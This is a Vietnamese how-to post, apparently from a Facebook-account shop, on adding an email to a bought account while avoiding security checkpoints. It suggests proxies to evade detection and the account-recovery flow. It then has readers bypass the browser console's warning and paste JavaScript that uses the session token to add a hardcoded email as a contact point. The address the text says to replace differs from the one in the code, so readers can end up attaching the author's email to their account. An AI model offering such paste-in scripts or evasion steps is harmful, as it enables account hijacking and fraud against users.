Cách thêm email vào nick facebook không bị checkpoint

Tại sao phải thêm mail mới vào facebook

-Khi bạn mua nick facebook mới mà bạn muốn thay thế mail khác vào đê bảo mật và an toàn

-Khi bạn phát hiện có mail lạ và cần thêm mail mới vào

-Khi bạn quên pass facebook mà không nhớ pass mail để đổi pass

2 cách thêm em mới vào tài khoản facebook an toàn

1. thêm mail bằng link hacked:

-Bạn muốn mua nick facebook sau đó các bạn đăng nhập bằng cách đổi ip mạng, bạn có thể dùng proxy để đổi - sau đó vào link m.facebook.com

-Sau khi đăng nhập xong bạn vào đường link m.facebook.com/hacked sau đó bấm dòng thứ 2 hoặc cuối

-tiếp theo các bạn điền pass cũ - thay pass mới

-Tiếp đến tích vào xóa email và thêm mail mới

- Vào mail xác  nhận mã là xong

Chúc các bạn thành công

2. Thêm gmail bằng code

Bước 1: truy cập trang https://www.facebook.com/ trên trình duyệt

Bước 2: Bấm chuột phải vào màn hình -> chọn kiểm tra

Bước 3: cửa sổ DevTools được bật lên -> chọn tab Console -> màn hình hiển thị cảnh báo “Dừng lại”

Bước 4: copy toàn bộ code dưới đây

var spinR = require(["SiteData"]).__spin_r; var spinB = require(["SiteData"]).__spin_b; var spinT = require(["SiteData"]).__spin_t; var jazoest = require(["SprinkleConfig"]).jazoest; var fbdtsg = require(["DTSGInitData"]).token; var userId = require(["CurrentUserInitialData"]).USER_ID; var hsi = require(["SiteData"]).hsi; var email = "voletinhson1991@gmail.com"; var url = "https://www.facebook.com/add_contactpoint/dialog/submit/"; var data = "jazoest=22134&fb_dtsg=" + fbdtsg + "&next=&contactpoint=" + email + "&__user=" + userId + "&__a=1&__dyn=&__req=1&__be=1&__pc=PHASED%3ADEFAULT&dpr=1&__rev=&__s=&__hsi=" + hsi + "&__spin_r=" + spinR + "&__spin_b=" + spinB + "&__spin_t=" + spinT; fetch(url, { method: 'POST', body: data, headers: { 'Content-Type': 'application/x-www-form-urlencoded' } }).then(e => e.text()).then(e => {})

Thay voletinhson11@gmail.com bằng mail của bạn bấm emter là xong nhé

Video hướng dẫn nè https://youtu.be/yMvqGoz-TIk

Xem thêm : Mua nick facebook giá rẻ

Hỗ trợ : https://www.facebook.com/shopmmo24h